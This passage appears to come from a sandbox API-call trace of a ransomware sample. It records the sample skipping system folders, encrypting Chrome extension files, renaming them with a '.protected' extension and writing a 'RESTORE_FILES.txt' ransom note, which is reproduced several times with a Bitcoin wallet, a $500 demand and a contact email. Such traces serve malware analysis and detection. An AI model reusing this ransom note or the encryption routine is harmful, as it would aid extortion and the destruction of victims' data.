this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.608] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.609] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.609] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.609] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.609] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.609] CloseHandle (hObject=0x164) returned 1 [0080.609] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.609] lstrcmpiW (lpString1="mr", lpString2="Windows") returned -1 [0080.609] lstrcmpiW (lpString1="mr", lpString2="Program Files") returned -1 [0080.609] lstrcmpiW (lpString1="mr", lpString2="Program Files (x86)") returned -1 [0080.610] lstrcmpiW (lpString1="mr", lpString2="$Recycle.bin") returned 1 [0080.610] lstrcmpiW (lpString1="mr", lpString2="System Volume Information") returned -1 [0080.610] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr") returned 141 [0080.610] lstrcmpW (lpString1="mr", lpString2=".") returned 1 [0080.610] lstrcmpW (lpString1="mr", lpString2="..") returned 1 [0080.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\*") returned 143 [0080.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.610] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.610] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.610] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.610] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.610] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\.") returned 143 [0080.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.610] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.610] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.610] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\..") returned 144 [0080.610] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.610] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.610] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.610] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.610] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.611] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.611] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.611] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json") returned 155 [0080.611] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.611] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json") returned 155 [0080.612] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json") returned 155 [0080.612] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json") returned 155 [0080.612] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.612] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x12c, lpOverlapped=0x0) returned 1 [0080.613] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.613] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x12c, lpOverlapped=0x0) returned 1 [0080.613] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.613] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.613] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.613] CloseHandle (hObject=0x168) returned 1 [0080.614] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.protected") returned 165 [0080.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.protected")) returned 1 [0080.614] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.614] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.614] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\RESTORE_FILES.txt") returned 159 [0080.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.615] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.615] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.616] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.616] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.616] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.616] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.616] CloseHandle (hObject=0x164) returned 1 [0080.616] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0080.616] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms") returned 141 [0080.616] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0080.616] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0080.616] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\*") returned 143 [0080.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.616] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.617] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.617] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.617] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.617] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.617] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\.") returned 143 [0080.617] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.617] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.617] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.617] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.617] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.617] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.617] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.617] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\..") returned 144 [0080.617] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.617] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.617] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json") returned 155 [0080.617] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.617] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.617] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.617] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json") returned 155 [0080.618] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json") returned 155 [0080.618] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json") returned 155 [0080.618] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.618] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcb, lpOverlapped=0x0) returned 1 [0080.619] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.619] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcb, lpOverlapped=0x0) returned 1 [0080.619] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.619] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.619] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.619] CloseHandle (hObject=0x168) returned 1 [0080.619] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.protected") returned 165 [0080.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.protected")) returned 1 [0080.620] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.620] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.620] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\RESTORE_FILES.txt") returned 159 [0080.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.621] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe 